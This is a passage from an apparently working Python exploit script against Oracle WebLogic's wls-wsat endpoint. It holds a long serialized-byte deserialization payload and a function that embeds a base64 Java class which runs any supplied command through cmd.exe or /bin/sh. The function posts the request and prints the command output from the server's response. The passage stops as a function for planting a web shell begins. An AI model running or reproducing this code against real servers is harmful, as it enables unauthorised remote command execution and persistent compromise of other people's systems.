index=\"4477\"><byte>115</byte></void><void index=\"4478\"><byte>47</byte></void><void index=\"4479\"><byte>117</byte></void><void index=\"4480\"><byte>116</byte></void><void index=\"4481\"><byte>105</byte></void><void index=\"4482\"><byte>108</byte></void><void index=\"4483\"><byte>47</byte></void><void index=\"4484\"><byte>71</byte></void><void index=\"4485\"><byte>97</byte></void><void index=\"4486\"><byte>100</byte></void><void index=\"4487\"><byte>103</byte></void><void index=\"4488\"><byte>101</byte></void><void index=\"4489\"><byte>116</byte></void><void index=\"4490\"><byte>115</byte></void><void index=\"4491\"><byte>0</byte></void><void index=\"4492\"><byte>33</byte></void><void index=\"4493\"><byte>0</byte></void><void index=\"4494\"><byte>2</byte></void><void index=\"4495\"><byte>0</byte></void><void index=\"4496\"><byte>3</byte></void><void index=\"4497\"><byte>0</byte></void><void index=\"4498\"><byte>1</byte></void><void index=\"4499\"><byte>0</byte></void><void index=\"4500\"><byte>4</byte></void><void index=\"4501\"><byte>0</byte></void><void index=\"4502\"><byte>1</byte></void><void index=\"4503\"><byte>0</byte></void><void index=\"4504\"><byte>26</byte></void><void index=\"4505\"><byte>0</byte></void><void index=\"4506\"><byte>5</byte></void><void index=\"4507\"><byte>0</byte></void><void index=\"4508\"><byte>6</byte></void><void index=\"4509\"><byte>0</byte></void><void index=\"4510\"><byte>1</byte></void><void index=\"4511\"><byte>0</byte></void><void index=\"4512\"><byte>7</byte></void><void index=\"4513\"><byte>0</byte></void><void index=\"4514\"><byte>0</byte></void><void index=\"4515\"><byte>0</byte></void><void index=\"4516\"><byte>2</byte></void><void index=\"4517\"><byte>0</byte></void><void index=\"4518\"><byte>8</byte></void><void index=\"4519\"><byte>0</byte></void><void index=\"4520\"><byte>1</byte></void><void index=\"4521\"><byte>0</byte></void><void index=\"4522\"><byte>1</byte></void><void index=\"4523\"><byte>0</byte></void><void index=\"4524\"><byte>10</byte></void><void index=\"4525\"><byte>0</byte></void><void index=\"4526\"><byte>11</byte></void><void index=\"4527\"><byte>0</byte></void><void index=\"4528\"><byte>1</byte></void><void index=\"4529\"><byte>0</byte></void><void index=\"4530\"><byte>12</byte></void><void index=\"4531\"><byte>0</byte></void><void index=\"4532\"><byte>0</byte></void><void index=\"4533\"><byte>0</byte></void><void index=\"4534\"><byte>47</byte></void><void index=\"4535\"><byte>0</byte></void><void index=\"4536\"><byte>1</byte></void><void index=\"4537\"><byte>0</byte></void><void index=\"4538\"><byte>1</byte></void><void index=\"4539\"><byte>0</byte></void><void index=\"4540\"><byte>0</byte></void><void index=\"4541\"><byte>0</byte></void><void index=\"4542\"><byte>5</byte></void><void index=\"4543\"><byte>42</byte></void><void index=\"4544\"><byte>-73</byte></void><void index=\"4545\"><byte>0</byte></void><void index=\"4546\"><byte>1</byte></void><void index=\"4547\"><byte>-79</byte></void><void index=\"4548\"><byte>0</byte></void><void index=\"4549\"><byte>0</byte></void><void index=\"4550\"><byte>0</byte></void><void index=\"4551\"><byte>2</byte></void><void index=\"4552\"><byte>0</byte></void><void index=\"4553\"><byte>13</byte></void><void index=\"4554\"><byte>0</byte></void><void index=\"4555\"><byte>0</byte></void><void index=\"4556\"><byte>0</byte></void><void index=\"4557\"><byte>6</byte></void><void index=\"4558\"><byte>0</byte></void><void index=\"4559\"><byte>1</byte></void><void index=\"4560\"><byte>0</byte></void><void index=\"4561\"><byte>0</byte></void><void index=\"4562\"><byte>0</byte></void><void index=\"4563\"><byte>60</byte></void><void index=\"4564\"><byte>0</byte></void><void index=\"4565\"><byte>14</byte></void><void index=\"4566\"><byte>0</byte></void><void index=\"4567\"><byte>0</byte></void><void index=\"4568\"><byte>0</byte></void><void index=\"4569\"><byte>12</byte></void><void index=\"4570\"><byte>0</byte></void><void index=\"4571\"><byte>1</byte></void><void index=\"4572\"><byte>0</byte></void><void index=\"4573\"><byte>0</byte></void><void index=\"4574\"><byte>0</byte></void><void index=\"4575\"><byte>5</byte></void><void index=\"4576\"><byte>0</byte></void><void index=\"4577\"><byte>15</byte></void><void index=\"4578\"><byte>0</byte></void><void index=\"4579\"><byte>18</byte></void><void index=\"4580\"><byte>0</byte></void><void index=\"4581\"><byte>0</byte></void><void index=\"4582\"><byte>0</byte></void><void index=\"4583\"><byte>2</byte></void><void index=\"4584\"><byte>0</byte></void><void index=\"4585\"><byte>19</byte></void><void index=\"4586\"><byte>0</byte></void><void index=\"4587\"><byte>0</byte></void><void index=\"4588\"><byte>0</byte></void><void index=\"4589\"><byte>2</byte></void><void index=\"4590\"><byte>0</byte></void><void index=\"4591\"><byte>20</byte></void><void index=\"4592\"><byte>0</byte></void><void index=\"4593\"><byte>17</byte></void><void index=\"4594\"><byte>0</byte></void><void index=\"4595\"><byte>0</byte></void><void index=\"4596\"><byte>0</byte></void><void index=\"4597\"><byte>10</byte></void><void index=\"4598\"><byte>0</byte></void><void index=\"4599\"><byte>1</byte></void><void index=\"4600\"><byte>0</byte></void><void index=\"4601\"><byte>2</byte></void><void index=\"4602\"><byte>0</byte></void><void index=\"4603\"><byte>22</byte></void><void index=\"4604\"><byte>0</byte></void><void index=\"4605\"><byte>16</byte></void><void index=\"4606\"><byte>0</byte></void><void index=\"4607\"><byte>9</byte></void><void index=\"4608\"><byte>112</byte></void><void index=\"4609\"><byte>116</byte></void><void index=\"4610\"><byte>0</byte></void><void index=\"4611\"><byte>4</byte></void><void index=\"4612\"><byte>80</byte></void><void index=\"4613\"><byte>119</byte></void><void index=\"4614\"><byte>110</byte></void><void index=\"4615\"><byte>114</byte></void><void index=\"4616\"><byte>112</byte></void><void index=\"4617\"><byte>119</byte></void><void index=\"4618\"><byte>1</byte></void><void index=\"4619\"><byte>0</byte></void><void index=\"4620\"><byte>120</byte></void><void index=\"4621\"><byte>115</byte></void><void index=\"4622\"><byte>125</byte></void><void index=\"4623\"><byte>0</byte></void><void index=\"4624\"><byte>0</byte></void><void index=\"4625\"><byte>0</byte></void><void index=\"4626\"><byte>1</byte></void><void index=\"4627\"><byte>0</byte></void><void index=\"4628\"><byte>29</byte></void><void index=\"4629\"><byte>106</byte></void><void index=\"4630\"><byte>97</byte></void><void index=\"4631\"><byte>118</byte></void><void index=\"4632\"><byte>97</byte></void><void index=\"4633\"><byte>120</byte></void><void index=\"4634\"><byte>46</byte></void><void index=\"4635\"><byte>120</byte></void><void index=\"4636\"><byte>109</byte></void><void index=\"4637\"><byte>108</byte></void><void index=\"4638\"><byte>46</byte></void><void index=\"4639\"><byte>116</byte></void><void index=\"4640\"><byte>114</byte></void><void index=\"4641\"><byte>97</byte></void><void index=\"4642\"><byte>110</byte></void><void index=\"4643\"><byte>115</byte></void><void index=\"4644\"><byte>102</byte></void><void index=\"4645\"><byte>111</byte></void><void index=\"4646\"><byte>114</byte></void><void index=\"4647\"><byte>109</byte></void><void index=\"4648\"><byte>46</byte></void><void index=\"4649\"><byte>84</byte></void><void index=\"4650\"><byte>101</byte></void><void index=\"4651\"><byte>109</byte></void><void index=\"4652\"><byte>112</byte></void><void index=\"4653\"><byte>108</byte></void><void index=\"4654\"><byte>97</byte></void><void index=\"4655\"><byte>116</byte></void><void index=\"4656\"><byte>101</byte></void><void index=\"4657\"><byte>115</byte></void><void index=\"4658\"><byte>120</byte></void><void index=\"4659\"><byte>114</byte></void><void index=\"4660\"><byte>0</byte></void><void index=\"4661\"><byte>23</byte></void><void index=\"4662\"><byte>106</byte></void><void index=\"4663\"><byte>97</byte></void><void index=\"4664\"><byte>118</byte></void><void index=\"4665\"><byte>97</byte></void><void index=\"4666\"><byte>46</byte></void><void index=\"4667\"><byte>108</byte></void><void index=\"4668\"><byte>97</byte></void><void index=\"4669\"><byte>110</byte></void><void index=\"4670\"><byte>103</byte></void><void index=\"4671\"><byte>46</byte></void><void index=\"4672\"><byte>114</byte></void><void index=\"4673\"><byte>101</byte></void><void index=\"4674\"><byte>102</byte></void><void index=\"4675\"><byte>108</byte></void><void index=\"4676\"><byte>101</byte></void><void index=\"4677\"><byte>99</byte></void><void index=\"4678\"><byte>116</byte></void><void index=\"4679\"><byte>46</byte></void><void index=\"4680\"><byte>80</byte></void><void index=\"4681\"><byte>114</byte></void><void index=\"4682\"><byte>111</byte></void><void index=\"4683\"><byte>120</byte></void><void index=\"4684\"><byte>121</byte></void><void index=\"4685\"><byte>-31</byte></void><void index=\"4686\"><byte>39</byte></void><void index=\"4687\"><byte>-38</byte></void><void index=\"4688\"><byte>32</byte></void><void index=\"4689\"><byte>-52</byte></void><void index=\"4690\"><byte>16</byte></void><void index=\"4691\"><byte>67</byte></void><void index=\"4692\"><byte>-53</byte></void><void index=\"4693\"><byte>2</byte></void><void index=\"4694\"><byte>0</byte></void><void index=\"4695\"><byte>1</byte></void><void index=\"4696\"><byte>76</byte></void><void index=\"4697\"><byte>0</byte></void><void index=\"4698\"><byte>1</byte></void><void index=\"4699\"><byte>104</byte></void><void index=\"4700\"><byte>116</byte></void><void index=\"4701\"><byte>0</byte></void><void index=\"4702\"><byte>37</byte></void><void index=\"4703\"><byte>76</byte></void><void index=\"4704\"><byte>106</byte></void><void index=\"4705\"><byte>97</byte></void><void index=\"4706\"><byte>118</byte></void><void index=\"4707\"><byte>97</byte></void><void index=\"4708\"><byte>47</byte></void><void index=\"4709\"><byte>108</byte></void><void index=\"4710\"><byte>97</byte></void><void index=\"4711\"><byte>110</byte></void><void index=\"4712\"><byte>103</byte></void><void index=\"4713\"><byte>47</byte></void><void index=\"4714\"><byte>114</byte></void><void index=\"4715\"><byte>101</byte></void><void index=\"4716\"><byte>102</byte></void><void index=\"4717\"><byte>108</byte></void><void index=\"4718\"><byte>101</byte></void><void index=\"4719\"><byte>99</byte></void><void index=\"4720\"><byte>116</byte></void><void index=\"4721\"><byte>47</byte></void><void index=\"4722\"><byte>73</byte></void><void index=\"4723\"><byte>110</byte></void><void index=\"4724\"><byte>118</byte></void><void index=\"4725\"><byte>111</byte></void><void index=\"4726\"><byte>99</byte></void><void index=\"4727\"><byte>97</byte></void><void index=\"4728\"><byte>116</byte></void><void index=\"4729\"><byte>105</byte></void><void index=\"4730\"><byte>111</byte></void><void index=\"4731\"><byte>110</byte></void><void index=\"4732\"><byte>72</byte></void><void index=\"4733\"><byte>97</byte></void><void index=\"4734\"><byte>110</byte></void><void index=\"4735\"><byte>100</byte></void><void index=\"4736\"><byte>108</byte></void><void index=\"4737\"><byte>101</byte></void><void index=\"4738\"><byte>114</byte></void><void index=\"4739\"><byte>59</byte></void><void index=\"4740\"><byte>120</byte></void><void index=\"4741\"><byte>112</byte></void><void index=\"4742\"><byte>115</byte></void><void index=\"4743\"><byte>114</byte></void><void index=\"4744\"><byte>0</byte></void><void index=\"4745\"><byte>50</byte></void><void index=\"4746\"><byte>115</byte></void><void index=\"4747\"><byte>117</byte></void><void index=\"4748\"><byte>110</byte></void><void index=\"4749\"><byte>46</byte></void><void index=\"4750\"><byte>114</byte></void><void index=\"4751\"><byte>101</byte></void><void index=\"4752\"><byte>102</byte></void><void index=\"4753\"><byte>108</byte></void><void index=\"4754\"><byte>101</byte></void><void index=\"4755\"><byte>99</byte></void><void index=\"4756\"><byte>116</byte></void><void index=\"4757\"><byte>46</byte></void><void index=\"4758\"><byte>97</byte></void><void index=\"4759\"><byte>110</byte></void><void index=\"4760\"><byte>110</byte></void><void index=\"4761\"><byte>111</byte></void><void index=\"4762\"><byte>116</byte></void><void index=\"4763\"><byte>97</byte></void><void index=\"4764\"><byte>116</byte></void><void index=\"4765\"><byte>105</byte></void><void index=\"4766\"><byte>111</byte></void><void index=\"4767\"><byte>110</byte></void><void index=\"4768\"><byte>46</byte></void><void index=\"4769\"><byte>65</byte></void><void index=\"4770\"><byte>110</byte></void><void index=\"4771\"><byte>110</byte></void><void index=\"4772\"><byte>111</byte></void><void index=\"4773\"><byte>116</byte></void><void index=\"4774\"><byte>97</byte></void><void index=\"4775\"><byte>116</byte></void><void index=\"4776\"><byte>105</byte></void><void index=\"4777\"><byte>111</byte></void><void index=\"4778\"><byte>110</byte></void><void index=\"4779\"><byte>73</byte></void><void index=\"4780\"><byte>110</byte></void><void index=\"4781\"><byte>118</byte></void><void index=\"4782\"><byte>111</byte></void><void index=\"4783\"><byte>99</byte></void><void index=\"4784\"><byte>97</byte></void><void index=\"4785\"><byte>116</byte></void><void index=\"4786\"><byte>105</byte></void><void index=\"4787\"><byte>111</byte></void><void index=\"4788\"><byte>110</byte></void><void index=\"4789\"><byte>72</byte></void><void index=\"4790\"><byte>97</byte></void><void index=\"4791\"><byte>110</byte></void><void index=\"4792\"><byte>100</byte></void><void index=\"4793\"><byte>108</byte></void><void index=\"4794\"><byte>101</byte></void><void index=\"4795\"><byte>114</byte></void><void index=\"4796\"><byte>85</byte></void><void index=\"4797\"><byte>-54</byte></void><void index=\"4798\"><byte>-11</byte></void><void index=\"4799\"><byte>15</byte></void><void index=\"4800\"><byte>21</byte></void><void index=\"4801\"><byte>-53</byte></void><void index=\"4802\"><byte>126</byte></void><void index=\"4803\"><byte>-91</byte></void><void index=\"4804\"><byte>2</byte></void><void index=\"4805\"><byte>0</byte></void><void index=\"4806\"><byte>2</byte></void><void index=\"4807\"><byte>76</byte></void><void index=\"4808\"><byte>0</byte></void><void index=\"4809\"><byte>12</byte></void><void index=\"4810\"><byte>109</byte></void><void index=\"4811\"><byte>101</byte></void><void index=\"4812\"><byte>109</byte></void><void index=\"4813\"><byte>98</byte></void><void index=\"4814\"><byte>101</byte></void><void index=\"4815\"><byte>114</byte></void><void index=\"4816\"><byte>86</byte></void><void index=\"4817\"><byte>97</byte></void><void index=\"4818\"><byte>108</byte></void><void index=\"4819\"><byte>117</byte></void><void index=\"4820\"><byte>101</byte></void><void index=\"4821\"><byte>115</byte></void><void index=\"4822\"><byte>116</byte></void><void index=\"4823\"><byte>0</byte></void><void index=\"4824\"><byte>15</byte></void><void index=\"4825\"><byte>76</byte></void><void index=\"4826\"><byte>106</byte></void><void index=\"4827\"><byte>97</byte></void><void index=\"4828\"><byte>118</byte></void><void index=\"4829\"><byte>97</byte></void><void index=\"4830\"><byte>47</byte></void><void index=\"4831\"><byte>117</byte></void><void index=\"4832\"><byte>116</byte></void><void index=\"4833\"><byte>105</byte></void><void index=\"4834\"><byte>108</byte></void><void index=\"4835\"><byte>47</byte></void><void index=\"4836\"><byte>77</byte></void><void index=\"4837\"><byte>97</byte></void><void index=\"4838\"><byte>112</byte></void><void index=\"4839\"><byte>59</byte></void><void index=\"4840\"><byte>76</byte></void><void index=\"4841\"><byte>0</byte></void><void index=\"4842\"><byte>4</byte></void><void index=\"4843\"><byte>116</byte></void><void index=\"4844\"><byte>121</byte></void><void index=\"4845\"><byte>112</byte></void><void index=\"4846\"><byte>101</byte></void><void index=\"4847\"><byte>116</byte></void><void index=\"4848\"><byte>0</byte></void><void index=\"4849\"><byte>17</byte></void><void index=\"4850\"><byte>76</byte></void><void index=\"4851\"><byte>106</byte></void><void index=\"4852\"><byte>97</byte></void><void index=\"4853\"><byte>118</byte></void><void index=\"4854\"><byte>97</byte></void><void index=\"4855\"><byte>47</byte></void><void index=\"4856\"><byte>108</byte></void><void index=\"4857\"><byte>97</byte></void><void index=\"4858\"><byte>110</byte></void><void index=\"4859\"><byte>103</byte></void><void index=\"4860\"><byte>47</byte></void><void index=\"4861\"><byte>67</byte></void><void index=\"4862\"><byte>108</byte></void><void index=\"4863\"><byte>97</byte></void><void index=\"4864\"><byte>115</byte></void><void index=\"4865\"><byte>115</byte></void><void index=\"4866\"><byte>59</byte></void><void index=\"4867\"><byte>120</byte></void><void index=\"4868\"><byte>112</byte></void><void index=\"4869\"><byte>115</byte></void><void index=\"4870\"><byte>114</byte></void><void index=\"4871\"><byte>0</byte></void><void index=\"4872\"><byte>17</byte></void><void index=\"4873\"><byte>106</byte></void><void index=\"4874\"><byte>97</byte></void><void index=\"4875\"><byte>118</byte></void><void index=\"4876\"><byte>97</byte></void><void index=\"4877\"><byte>46</byte></void><void index=\"4878\"><byte>117</byte></void><void index=\"4879\"><byte>116</byte></void><void index=\"4880\"><byte>105</byte></void><void index=\"4881\"><byte>108</byte></void><void index=\"4882\"><byte>46</byte></void><void index=\"4883\"><byte>72</byte></void><void index=\"4884\"><byte>97</byte></void><void index=\"4885\"><byte>115</byte></void><void index=\"4886\"><byte>104</byte></void><void index=\"4887\"><byte>77</byte></void><void index=\"4888\"><byte>97</byte></void><void index=\"4889\"><byte>112</byte></void><void index=\"4890\"><byte>5</byte></void><void index=\"4891\"><byte>7</byte></void><void index=\"4892\"><byte>-38</byte></void><void index=\"4893\"><byte>-63</byte></void><void index=\"4894\"><byte>-61</byte></void><void index=\"4895\"><byte>22</byte></void><void index=\"4896\"><byte>96</byte></void><void index=\"4897\"><byte>-47</byte></void><void index=\"4898\"><byte>3</byte></void><void index=\"4899\"><byte>0</byte></void><void index=\"4900\"><byte>2</byte></void><void index=\"4901\"><byte>70</byte></void><void index=\"4902\"><byte>0</byte></void><void index=\"4903\"><byte>10</byte></void><void index=\"4904\"><byte>108</byte></void><void index=\"4905\"><byte>111</byte></void><void index=\"4906\"><byte>97</byte></void><void index=\"4907\"><byte>100</byte></void><void index=\"4908\"><byte>70</byte></void><void index=\"4909\"><byte>97</byte></void><void index=\"4910\"><byte>99</byte></void><void index=\"4911\"><byte>116</byte></void><void index=\"4912\"><byte>111</byte></void><void index=\"4913\"><byte>114</byte></void><void index=\"4914\"><byte>73</byte></void><void index=\"4915\"><byte>0</byte></void><void index=\"4916\"><byte>9</byte></void><void index=\"4917\"><byte>116</byte></void><void index=\"4918\"><byte>104</byte></void><void index=\"4919\"><byte>114</byte></void><void index=\"4920\"><byte>101</byte></void><void index=\"4921\"><byte>115</byte></void><void index=\"4922\"><byte>104</byte></void><void index=\"4923\"><byte>111</byte></void><void index=\"4924\"><byte>108</byte></void><void index=\"4925\"><byte>100</byte></void><void index=\"4926\"><byte>120</byte></void><void index=\"4927\"><byte>112</byte></void><void index=\"4928\"><byte>63</byte></void><void index=\"4929\"><byte>64</byte></void><void index=\"4930\"><byte>0</byte></void><void index=\"4931\"><byte>0</byte></void><void index=\"4932\"><byte>0</byte></void><void index=\"4933\"><byte>0</byte></void><void index=\"4934\"><byte>0</byte></void><void index=\"4935\"><byte>12</byte></void><void index=\"4936\"><byte>119</byte></void><void index=\"4937\"><byte>8</byte></void><void index=\"4938\"><byte>0</byte></void><void index=\"4939\"><byte>0</byte></void><void index=\"4940\"><byte>0</byte></void><void index=\"4941\"><byte>16</byte></void><void index=\"4942\"><byte>0</byte></void><void index=\"4943\"><byte>0</byte></void><void index=\"4944\"><byte>0</byte></void><void index=\"4945\"><byte>1</byte></void><void index=\"4946\"><byte>116</byte></void><void index=\"4947\"><byte>0</byte></void><void index=\"4948\"><byte>8</byte></void><void index=\"4949\"><byte>102</byte></void><void index=\"4950\"><byte>53</byte></void><void index=\"4951\"><byte>97</byte></void><void index=\"4952\"><byte>53</byte></void><void index=\"4953\"><byte>97</byte></void><void index=\"4954\"><byte>54</byte></void><void index=\"4955\"><byte>48</byte></void><void index=\"4956\"><byte>56</byte></void><void index=\"4957\"><byte>113</byte></void><void index=\"4958\"><byte>0</byte></void><void index=\"4959\"><byte>126</byte></void><void index=\"4960\"><byte>0</byte></void><void index=\"4961\"><byte>9</byte></void><void index=\"4962\"><byte>120</byte></void><void index=\"4963\"><byte>118</byte></void><void index=\"4964\"><byte>114</byte></void><void index=\"4965\"><byte>0</byte></void><void index=\"4966\"><byte>29</byte></void><void index=\"4967\"><byte>106</byte></void><void index=\"4968\"><byte>97</byte></void><void index=\"4969\"><byte>118</byte></void><void index=\"4970\"><byte>97</byte></void><void index=\"4971\"><byte>120</byte></void><void index=\"4972\"><byte>46</byte></void><void index=\"4973\"><byte>120</byte></void><void index=\"4974\"><byte>109</byte></void><void index=\"4975\"><byte>108</byte></void><void index=\"4976\"><byte>46</byte></void><void index=\"4977\"><byte>116</byte></void><void index=\"4978\"><byte>114</byte></void><void index=\"4979\"><byte>97</byte></void><void index=\"4980\"><byte>110</byte></void><void index=\"4981\"><byte>115</byte></void><void index=\"4982\"><byte>102</byte></void><void index=\"4983\"><byte>111</byte></void><void index=\"4984\"><byte>114</byte></void><void index=\"4985\"><byte>109</byte></void><void index=\"4986\"><byte>46</byte></void><void index=\"4987\"><byte>84</byte></void><void index=\"4988\"><byte>101</byte></void><void index=\"4989\"><byte>109</byte></void><void index=\"4990\"><byte>112</byte></void><void index=\"4991\"><byte>108</byte></void><void index=\"4992\"><byte>97</byte></void><void index=\"4993\"><byte>116</byte></void><void index=\"4994\"><byte>101</byte></void><void index=\"4995\"><byte>115</byte></void><void index=\"4996\"><byte>0</byte></void><void index=\"4997\"><byte>0</byte></void><void index=\"4998\"><byte>0</byte></void><void index=\"4999\"><byte>0</byte></void><void index=\"5000\"><byte>0</byte></void><void index=\"5001\"><byte>0</byte></void><void index=\"5002\"><byte>0</byte></void><void index=\"5003\"><byte>0</byte></void><void index=\"5004\"><byte>0</byte></void><void index=\"5005\"><byte>0</byte></void><void index=\"5006\"><byte>0</byte></void><void index=\"5007\"><byte>120</byte></void><void index=\"5008\"><byte>112</byte></void><void index=\"5009\"><byte>120</byte></void></array> \n</void></class>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body></soapenv:Body></soapenv:Envelope>\"\"\"\n\turl=\"%s/wls-wsat/CoordinatorPortType\"%(ip)\n\trsp = requests.post(url, data=body, verify=False, headers=headers)\n\tlogger.info(\"\\r\\n\"+rsp.text)\ndef weblogic_12_1_3(ip,cmd):\n\theaders = {\n    \"Accept-Language\":\"zh-CN,zh;q=0.9,en;q=0.8\",\n    \"User-Agent\":\"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50\", \n    \"Content-Type\":\"text/xml\"\n}\n\tbody='''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"> <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n<java>\n<class><string>org.slf4j.ext.EventData</string>\n<void>\n<string>\n\t\t<java>\n\t\t\t<void class=\"sun.misc.BASE64Decoder\">\n\t\t\t\t<void method=\"decodeBuffer\" id=\"byte_arr\">\t<string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string>\n\t\t\t\t</void>\n\t\t\t</void>\n\t\t\t<void class=\"org.mozilla.classfile.DefiningClassLoader\">\n\t\t\t\t<void method=\"defineClass\">\n\t\t\t\t\t<string>ResultBaseExec</string>\n\t\t\t\t\t<object idref=\"byte_arr\"></object>\n\t\t\t\t\t<void method=\"newInstance\">\n\t\t\t\t\t\t<void method=\"do_exec\" id=\"result\">\n\t\t\t\t\t\t\t<string>%s</string>\n\t\t\t\t\t\t</void>\n\t\t\t\t\t</void>\n\t\t\t\t</void>\n\t\t\t</void>\n\t\t\t<void class=\"java.lang.Thread\" method=\"currentThread\">\n\t\t\t\t<void method=\"getCurrentWork\" id=\"current_work\">\n\t\t\t\t\t<void method=\"getClass\">\n\t\t\t\t\t\t<void method=\"getDeclaredField\">\n\t\t\t\t\t\t\t<string>connectionHandler</string>\n\t\t\t\t\t\t\t\t<void method=\"setAccessible\"><boolean>true</boolean></void>\n\t\t\t\t\t\t\t<void method=\"get\">\n\t\t\t\t\t\t\t\t<object idref=\"current_work\"></object>\n\t\t\t\t\t\t\t\t<void method=\"getServletRequest\">\n\t\t\t\t\t\t\t\t\t<void method=\"getResponse\">\n\t\t\t\t\t\t\t\t\t\t<void method=\"getServletOutputStream\">\n\t\t\t\t\t\t\t\t\t\t\t<void method=\"writeStream\">\n\t\t\t\t\t\t\t\t\t\t\t\t<object class=\"weblogic.xml.util.StringInputStream\"><object idref=\"result\"></object></object>\n\t\t\t\t\t\t\t\t\t\t\t\t</void>\n\t\t\t\t\t\t\t\t\t\t\t<void method=\"flush\"/>\n\t\t\t\t\t\t\t\t\t\t\t</void>\n\t\t\t\t\t\t\t\t\t<void method=\"getWriter\"><void method=\"write\"><string></string></void></void>\n\t\t\t\t\t\t\t\t\t</void>\n\t\t\t\t\t\t\t\t</void>\n\t\t\t\t\t\t\t</void>\n\t\t\t\t\t\t</void>\n\t\t\t\t\t</void>\n\t\t\t\t</void>\n\t\t\t</void>\n\t\t</java>\n</string>\n</void>\n</class>\n</java>\n</work:WorkContext>\n</soapenv:Header>\n<soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>'''%(cmd)\n\turl=\"%s/wls-wsat/CoordinatorPortType\"%(ip)\n\trsp = requests.post(url, data=body, verify=False, headers=headers)\n\tlogger.info(\"\\r\\n\"+rsp.text)\ndef webshell_10_3_6(ip):\n\tbody='''<?xml version=\"1.0\" encoding=\"utf-8\" ?>\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" \nxmlns:wsa=\"http://www.w3.org/2005/08/addressing\" \nxmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">   \n<soapenv:Header> <wsa:Action/><wsa:RelatesTo/><asy:onAsyncDelivery/>\n<work:WorkContext 